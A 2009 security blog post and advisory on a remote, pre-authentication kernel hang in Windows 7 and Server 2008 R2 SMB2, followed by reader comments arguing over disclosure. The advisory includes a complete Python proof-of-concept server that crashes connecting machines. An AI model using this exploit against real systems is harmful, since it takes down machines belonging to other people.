Wednesday, November 11, 2009

Windows 7 / Server 2008R2 Remote Kernel Crash

This bug is a real proof that SDL FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be trigered outside the lan via (IE*)
The bug is so basic, it should have been spotted 2 years ago by the SDL if the SDL had ever existed:

netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)

If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
WHAT ?? you gotta be kidding me where's my SDL ?!?

"Most secure Os ever";
What ever your firewall is set to, you can get remotely smashed via IE or even via some broadcasting nbns tricks (no user interaction)


Advisory:

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
..

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()



V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Windows 7/Server 2008R2
on a LAN or via IE

VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windowns Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment, your vendor do not care.
Close SMB feature and ports, until a real audit is provided.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknowledge the vuln
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin.
November 11th, 2009: This bug released.

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

82 comments:

corelanc0d3r said...

awesome, well done !

Trancer said...

Nice one. You're really getting down on the MS SDL team...

Have you debugged this vulnerability? The crash is a result of what..? Overflow? Pointer deference?

Trancer said...

Aaaahhh ok I didn't saw this - Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop. NO BSOD, YOU GOTTA PULL THE PLUG.

Anonymous said...

awesome job Laurent !!!
SDL sucks ever !

Marco Ramilli said...

This is, really, unbelievable. The most secure os ever ... crashes trough an trivial Infinitive loop (moreover caused by a remote packet ) ? That's such amazing ! Good Job man !
My question, what was the bell that suggested you to investigate into this direction ? Why SMB ? It's old and, theoretically, assumed "safe" .
Again good job !

Anonymous said...

This is a real fucking nice shit. Good job. :)

SDL said...

You can simplify your POC and make it:
packet = "\x00\x00\x00\x9a"

The other lines are not being concatenated to the packet, so they are a no-op, and you only need to send 4 bytes to trigger this issue.

Anonymous said...

Actually, the other lines are being concatenated. This is a feature of Python to allow multiple line strings.

Anonymous said...

pathetic.

Anonymous said...

Nicely done. Tested it out on Win7 and Server 2008 R2 successfully.

http://praetorianprefect.com/archives/2009/11/how-to-crash-windows-7-and-server-2008/

Benjamin Flesch said...

Awesome,

this vulnerability shouldn't have existed in the first place.. :-)

Black said...

Mr. Gaffié! Good work. Keep up the same! We tried it in our labs and it works indeed!
Guess, it is time for a Servie Pack already! :P

Anonymous said...

NBNS exploit is fail if true. Good job!

Juji.PL said...

The netbios protocol is optional.
Newer versions of Windows may share
resources without it.
(and this is a better option)

Anonymous said...

Was anyone able to repro with SMBv1?

# root cd said...

Haha, you rock Laurent!

Anonymous said...

L'interet de dévoiler la faille sans laisser le temps à MS de se retourner ?
Se faire mousser peut etre ?

Anonymous said...

internet vandalsim.. very bad decision to maken this public like this.
Only three days after the discovery..

Anonymous said...

Why just not tell M$ about it instead of publushing it ?
Kinda stupid ...

Anonymous said...

ben non gros con il a prevenu

feniix said...

Hello Laurent, I tried it with not luck.

Is there anything special that needs to be enabled on the windows 7/2k8r2 machine?

Anonymous said...

il a prévenu y a 2jours tarlouze (facile d'être aggressif...)

Anonymous said...

Comment l'exploiter ? tuto ?

Algorn said...

As some people said,

Too bad someone published something only 3 days after discovering it.
Why don't you share it with MS only ? Maybe asking for money ?
This post is interesting but useless if you didn't share your discovery with MS.
I'm sorry but I don't the "Hello! I'm here to destroy Ms and everything else!" kind of guy.

Laurent Gaffié blog said...

That's the cost of security by obscurity and propaganda.
Like it or not, it's like that.

Anonymous said...

awesome, well done !

Super work good job.

Anonymous said...

You're right Laurent,the SDL should have seen this bug at the very first fuzzing sessions.
Keep it up, the industry needs people like you, your work is awesome.

Anonymous said...

T'es le plus fort Lolo, tu viens juste de perdre 300 000 $, somme que tu aurais gagné si t'avais communiqué ta faille "intelligemment" !
T'es vraiment le plus fort, continue de pisser du code, t'iras loin !

Anonymous said...

The Internet Storm Center http://isc.sans.org/diary.html?storyid=7573 said you left out one line of code and there was also some formatting issues. The speculation was that this was intentional on your part "to give Microsoft a chance to get a fix in..."

Is that true? Are you trying to go easy on MS or what?

Anonymous said...

Whats wrong with Microsoft and their apparent lack of any security whatsoever? This exploit couldnt possibly have made it past any fuzzer or attempt at auditing the code. They still just throw code together and skip it the instant it compiles, bugs be damned.

SDL is a joke, a PR stunt at best. Probably just one bloke writing a blog and not something ever used inside Microsoft.

Responsible disclosure is something that only works if there are responsible vendors. As long as MS and others take security as a PR issue its much better to do as laurent and let people know about the issues fast and take their own actions to mitigate problems / change vendor.

Anonymous said...

@last anonymous
well said man.
@laurent
keep up the good work.

Anonymous said...

Great work done buddy..!!!!

Anonymous said...

Ain't it possible to actually use the "auto discovery" feature of the "network neighborhood" to just crash the system w/o user input?

Aaron G said...

Excellent work Laurent. How long did it take to find this one? Fuck the non-disclosure or the "give micro$oft their time to fix it" people. They had their time.. they had PLENTY of time to fuzz the shit out of their code. How long did vista take? How many people work at micro$oft? God damn bluehat people have probably been saying this for years yet... seems like they're skipping that step of the SDL. Maybe releasing things full disclosure will make them change their ways (more than they already have) although that didn't work in the past. Fuck'em.

Adonaki said...

Why do you need to be so cocky about your finding? Got your job application at Redmont rejected?

Anonymous said...

Sorry, but you are just a pathetic MS hater. Do you think is it wise to public details 3 days after contacting MS?

And don't worry, more bugs gonna be found same as in any other OS, hopefully they'll be found by adult people.

Anonymous said...

How dare Microsoft or anyone else attack Mr. Gaffie or call him irresponsible over the release of this vulnerability/poc. It is not my job nor Mr. Gaffie's to provide free consulting services to Microsoft in order to fix or improve their shitty products.

Maybe one day Microsoft will get it threw their thick heads that compensation AND public recognition will slow the release of poc source. From my understanding, they offer no compensation, no public recognition, no gifts (software/msdn subscriptions).... NOTHING....

But, they expect all developers to volunteer their time, knowledge, and expertise for nothing.

F*ck them and the horse they rode in on...

But then again, these are just the opinions of one individual....

Anonymous said...

Tellement pathétique. Si les gens passaient autant de temps à chercher des failles sur les kernel linux, ou sur MacOS, on en aurait tous les jours des trucs comme ça. Changez un peu de cible, it's getting old to always focus on Microsoft...

Anonymous said...

At least i know what to do, turn off SMB, and don't trust what MS says.
Thanks Laurent.

Anonymous said...

Good job ;-)Thanks man

Anonymous said...

Please host a test site for this!!! OR i can host it give me the "plug and play code"

sdhushd said...

If SDL fails, then why do products like Internet Explorer, SQL Server, Windows Media and Silverlight have much fewer (4 times less) critical flaws discovered each year than Firefox, Oracle, Quick Time and Adobe Flash Player?

that must mean that products like Firefox, Oracle, Quick Time, Flash player are just plain FAILures themselves, coded in a crappy way!

Anyway, you don't seem to understand what SDL is.
If you believe that any development process could be able to lead to a flawless software, then you have no clue about what you're talking about.

You must think that linux is a huge failure too, since the typical linux distribution has much more flaws than any windows version (even those developped without SDL).

Laurent Gaffié blog said...

No, i dont believe in flawless software, but i do believe on hardened SMB/IP/RPC/NTB, and on fuzzing which
allow to spot theses kind of vulnerability very fast.
I dont believe in security by obscurity, which lead to this kind of dummy flaw.
You talk about linux; they dont have theses kind of no user interaction remote kernel panic.

What I'm trying to point out here is about 2 things:

They said new code go through stress testing,fuzzing, constant review, Bla.
It's false, and this bug proves it, it's brand new code.

The other thing is they concentrate way to much on IE and the Office suite, while SMB, IPv6, etc doesn't need any user
interaction, and are critical as they run with kernel privilege.

sad-wind said...

Why does Linux have so many SMB and kernel vulnearbilities?

Anonymous said...

"You talk about linux; they dont have theses kind of no user interaction remote kernel panic."

Really? Just first hit on Google.
http://www.builderau.com.au/news/soa/Linux-kernel-flaw-allows-DoS-attack/0,339028227,339131700,00.htm

And of course there are many more.

Anonymous said...

Remote crash over the Lan ... That's just pathetic and pointless. First contact with MS November 8th and P.O.C. released the 11th? Very responsible, congrat.

For those you guys pleased with this crap, you are also pathetic.

On more time, this "crash" is undoable over the wan. No code remote code execution. WTF?

All that crap to create the buzz? Fact is you bring nothing to the community.

Anonymous said...

The point of responsible disclosure is NOT to protect MS...it's to protect the businesses that depend on MS. Yes, MS missed something huge here, but that's no reason to put this out there for the world to have 3 days in. MS isn't who will be attacked, it's other businesses that may or may not be able to control this that will pay the price. Good work, but irresponsible thought process here.

Anonymous said...

blogspot = free mister, calling Microsoft you might end up losing like 30 euro before you even come close to the person to speak with. This way you can be sure they will find out and besides that, its way better than keeping it underground and that somebody will code a nifty worm which will cause to massive amounts of viagra spam in your inbox. Once i tried to report a XSS to Microsoft through phone and i just gave up (they are still vulnerable to it today) they are like zombies moaning about if you are a customer. I would nearly say i experienced how it was to be black in the middle of a circle of KKK members (not that any other creditcard company would listen better, if you find a security leak on something like HSBC you can better just forget it, they just won’t listen to you in any way untill you post it on a blog/xssed or any other site to give it some wheels in the media.

Anonymous said...

stop whining it's just a dos and a good way to prove a point.

Anonymous said...

C'est dommage que rien n'a été effectué dans les règles de l'art, à part peut-être le "sploit" dont ce monsieur semble très fier de partager. Un jour la communauté se rendra compte qu'elle perd au change à vouloir pavaner ses sploits en avance et donne aucune chance à l'industrie. Mais bon probablement que tout seul dans son sous-sol, c'était pas très profitable pour lui d'avoir ce sploit :)

Anonymous said...

tiens le pauvre idiot a effacé mon commentaire, c'est ennuyant de se faire dire qu'on a été con par les gens de sa communauté :) on va bien se rappeler de ce nom là Laurent Gaffié hahah

Anonymous said...

and he's writing on his own blog as anonymous trying to pass as someone else haha

Anonymous said...

the only point you proved is that you were a selfish idiot not thinking about the consequences of your act

Ron said...

Wow...im glad I switched to Linux last year...windows has been getting crazy.

is this like the old ping of death attack from the windows 98 days?

Laurent Gaffié blog said...

@ 4 derniers anonymous (même personne);
Je sais très bien quoi faire avec un sploit, cependant je suis pas un money whore, jvais pas vendre ca à des gens qui pourraient l'utiliser contre mon gouvernement.
J'appelle pas ca faire de la "sécurité".
Tout ceux qui sont à risque peuvent se protéger si ils sont déjà sous windows 7.

Also i dont need to post as "anonymous", I assume what i say, not like you.

Maintenant si toi, tu pense que le système tel qu'il est avec ce genre de pensée unique est bon, ca ne regarde que toi, et ton nez brun, ne vas pas assumer que les autres doivent te suivre dans ce qui est un echec.
Je pense différement,tu parle de "communautée";
une communauté qui ne peut pas accepter que les gens peuvent penser différement, ce n'est pas une communautée,c'est de la dictature transparente.

Anonymous said...

I'm an IT guy and it only made me laugh and cheer a bit. It's a problem that, as he points out, is something that should have been caught by the vendor themselves a long time ago.

Anonymous said...

Good research... .There is STILL some problems in netbios though , in older qwindows unreported, so this is no surprise... they have never given a sh*t about users security, look , code is out, no patch ? is a 4byte stack b0f that HARD TO PATCH ? Fuck em, i tried treporting to them also, and 3 times, they denied existence! lol... i did also hacve this with BSD security team also... the top os or, they think theyre tops, do NOT LIKE to admit, they did NOT CHECK SRC CODE! Simple as that, this should NEVER have ever gotten into a final or even close!
Great research but, unfortunately you are only helping , fellow people who CARE ABOUT ALL SECURITY not just one type... but, netbios is always and still so [piss damn easy to attack, most users, still dont use passes... or avoid using them for own reasons... so, i guess this shit will always exist, and, I bet there is a cmd exec here ;)
Cheers,
xd

Anonymous said...

"And while this flaw is embarrassing for Microsoft, it's hard to see why anyone would bother to exploit it: It's only a denial of service, meaning that it locks up other computers, and it only works on the LAN, not over the Internet. So it's not good, but it's probably not a big deal. And it's not a "zero-day.""


http://www.pcmag.com/article2/0,2817,2355864,00.asp?kc=PCRSS03069TX1K0001121&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+ziffdavis%2Fpcmag%2Fbreakingnews+%28PCMag.com+Breaking+News%29

Anonymous said...

Why don't they ever magnify issues in Linux or other products like this? SQL Server has had a little more than 10 security fixes (in 5 years!) while Oracle had over 300 in the same timeframe. Firefox accounts for 44% of browser vulnerabilities, ...

Anonymous said...

another m$ comment...

penile said...

Ya linux doesnt have that, but everything else is shit. Well I give you props, you could have let this stay underground but you released it and for that you must be a good guy :p

Subbu said...

I love this :) Great Job. What were MS Engineers doing so far?!!!!!!

Byron said...

Yeh Microsoft sucks but hey, you should be more professional in your report. When you say "your vendor does not care" shows you are not subjective at all. Nice to be always a pro without any exception. Still MS sucks.

Mikko said...

You must be very proud of yourself...not!

Christophe said...

Salut Laurent. Good job! Je suis de ceux qui pense qu'il faut taper M$ là où ça fait mal, car eux se fichent pas mal d'être éthiquement correct et se contrefichent de fournir de bons produits à leurs clients. Et c'est sûrement l'un des rares moyens de faire entendre raison à ce truand qu'est M$.

En revanche, je suis un peu surpris de ton dernier commentaire où j'ai peut-être mal saisi ce que j'ai lu : "nez brun" (?). Tu t'adresses à un imbécile je comprends bien, mais tu sembles t'emporter... Tu connais le principe du point Godwin :)

cdlt,
--
Christophe

nibu said...

Damn....

Ulterior said...

Very good. Keep destroying Ms

Frank said...

awesome job here!!!

zazie-lavender said...

Nice find. Critical or not, Microsoft needs to refine it's exploit reporting channels. Security researchers like him shouldn't have to publicly disclose this sort of stuff to get a patch released. It'd be a simple enough matter for MS to release a workaround patch for this via Windows Update. It'd be easy enough to check the system's settings for active shares, and if none exist, disable SMB until the real patch is released. If shares do exist, it would simply prompt the user after informing them of the risk level.

gorfou said...

nice one !
Thanks Laurent

DK said...

Damn...I didn't hear Laurent ask for anyone's advice on disclosure, his opinion of MSFT, or anything else. Why doesn't everyone who thinks they're better off not knowing about software vulnerabilities go somewhere else and stick your head in the sand?

3 days, a week, a month? Laurent doesn't work for MSFT, he doesn't owe them or you anything. This is the equivalent of noticing your car explodes if you back it into something, disclosing the fact that it happens is reality, the person who tells you before you explode has done you a favor.

LinoX said...

You should first release it to the public and THEN contact MS.

Their way of work is really awful. Our OSes are full of stupid bugs (that remain hidded because of closed source). They don't need to triple check the code just because every security flaw is first signaled then made public.
Fuck you! YOU MUST CHECK THE CODE I'M RUNNING. I paid for it and I want it to be almost bug free.. yes.. it is not possible but such stupid bugs make me think they don't check their code at all.

A 0 day exploit like this can be a pain in terms of image. There should be more.. maybe they'll start doing things as they should!

nels said...

Last but not least ?
Only one failure !!!

thimer said...

Well done man!!! tre bien!!!
really good job.

Research Writer said...

Many institutions limit access to their online information. Making this information available will be an asset to all.
Paper on Research

JaseVV said...
This comment has been removed by the author.
johnclick2325 said...

Awesome. It is amazing how some people come up with cool ideas.

Silver MLM said...

Share files between windows 7 home and windows server 2003?

android application development said...

Nice posting....

darklord said...

this is a nice post...are there other such vulnerabilities discovered for Win7?

Riverside wrongful death attorney said...

Great post! Thanks for bringing this to us.

Fowlers Motors said...

Really...I didn't listen to Laurent ask for a person's guidance on disclosure, his viewpoint of MSFT, or anything else. Why doesn't everyone who believes they're better off not understanding about application weaknesses go somewhere else and keep your go in the sand?

Post a Comment